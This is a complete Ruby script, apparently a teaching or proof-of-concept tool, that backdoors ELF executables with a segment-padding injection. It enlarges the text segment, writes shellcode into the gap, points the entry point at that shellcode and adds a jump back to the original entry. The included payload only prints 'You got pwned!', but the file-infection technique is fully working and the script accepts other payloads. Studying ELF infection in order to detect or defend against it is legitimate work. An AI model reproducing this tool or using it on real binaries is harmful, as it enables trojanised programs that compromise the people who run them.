#!/usr/bin/env ruby

require 'optparse'
require 'elftools'
require 'fileutils'



def inject_payload(targetelf, payload_opt, outfile)
    unless targetelf.is_a?(String) and
        payload_opt.is_a?(String) and
        outfile.is_a?(String)
        raise "Wrong parameters in inject_payload()"
    end

    # Try to open the target elf and check if it can be patched
    begin
        puts "Opening " + targetelf + "..."
        e = ELFTools::ELFFile.new(File.open(targetelf))
    rescue
        abort("Unable to open file\nMake sure it exists and it is an elf file")
    end

    unless e.header.e_type == 2 or e.header.e_type == 3
        raise "File is not an executable"
    end

    text_seg = nil
    next_seg = nil

    # Search for the text segment
    puts "Searching for the text segment..."
    e.segments.each_with_index do |s, i|
        if s.header.p_flags == 0x1|0x4 and s.executable? and s.readable?
            text_seg = s
            if i == e.segments.length - 1
                raise "Unable to find text segment"
            else
                next_seg = e.segments[i + 1]
            end
            break
        end
    end

    if text_seg == nil or next_seg == nil
        abort("Unable to find a text segment to fit the backdoor in")
    end

    # Calculate the payload space, the payload offset and the new entry point
    av_space = (text_seg.header.p_offset + text_seg.header.p_filesz - next_seg.header.p_offset).abs
    write_payload_offset = text_seg.header.p_offset + text_seg.header.p_filesz
    new_entry_point = text_seg.header.p_vaddr + text_seg.header.p_memsz
    puts "Found possible injection of " + av_space.to_s + " bytes"
    # Generate the payload
    payload = Payload.new(payload_opt)
    payload.add_jmp_back(e.header.e_entry, new_entry_point)
    puts "Payload size: " + payload.get_size.to_s
    raise "Payload cannot fit in the available space" unless av_space > payload.get_size
    # Create the space for the payload and save the file
    puts "Making space for the payload..."
    text_seg.header.p_filesz += payload.get_size
    text_seg.header.p_memsz += payload.get_size
    e.header.e_entry = new_entry_point
    e.save(outfile)
    # Insert the payload in the created space and make the file executable
    puts "Injecting the payload..."
    File.binwrite(outfile, payload.get_bytes, write_payload_offset)
    FileUtils.chmod(0755, outfile)
    puts "File backdoored successfully!"
end

# Class representing a payload
class Payload

    def initialize(payloadopt)
        case payloadopt
        when 'sample'
            self.set_bytes = @@sample64 
        else
            abort("No supported option for the specified payload")
        end
    end

    def get_bytes
        @bytes
    end

    def set_bytes=(value)
        @bytes = value
    end

    def get_size
        @bytes.size
    end
    
    def add_jmp_back(e_entry, payload_entry)
        @bytes += "\xe9".force_encoding(Encoding::ASCII_8BIT)
        offset = e_entry - payload_entry - self.get_size - 4
        @bytes += [offset].pack('L')
    end

    @@sample64 = ("\x55\x48\x89\xe5" +
                "\x50\x53\x57\x52\xeb\x1b\x5b\x48\x89\xde\xb8\x01\x00\x00\x00" + 
                "\xbf\x01\x00\x00\x00\xba\x10\x00\x00\x00\x0f\x05\x5a\x5f\x5b\x58\xeb\x15" + 
                "\xe8\xe0\xff\xff\xff" + 
                "\x59\x6f\x75\x20\x67\x6f\x74\x20\x70\x77\x6e\x65\x64\x21\x0a\x00" +
                "\x5d")
                .force_encoding(Encoding::ASCII_8BIT)
end


opts = { :payload => 'sample',
         :targetelf => nil,
         :outfile => nil }

optparser = OptionParser.new do |opt| 
    opt.on("-i", "--inject ELFFILE", "Target elf to backdoor") { |e| opts[:targetelf] = e } 
    opt.on("-o", "--out OUTFILE", "The output file name") { |f| opts[:outfile] = f }
    opt.on("-p", "--payload PAYLOAD", "The payload to insert") { |p| opts[:payload] = p }
end
optparser.parse!

begin
    if opts[:targetelf] == nil or opts[:outfile] == nil
        raise OptionParser::InvalidOption, OptionParser::MissingArgument
    end
rescue OptionParser::InvalidOption, OptionParser::MissingArgument
    puts optparser.help
    exit
end

begin
    inject_payload(opts[:targetelf], opts[:payload], opts[:outfile])
rescue StandardError => e
    abort(e.message)
end



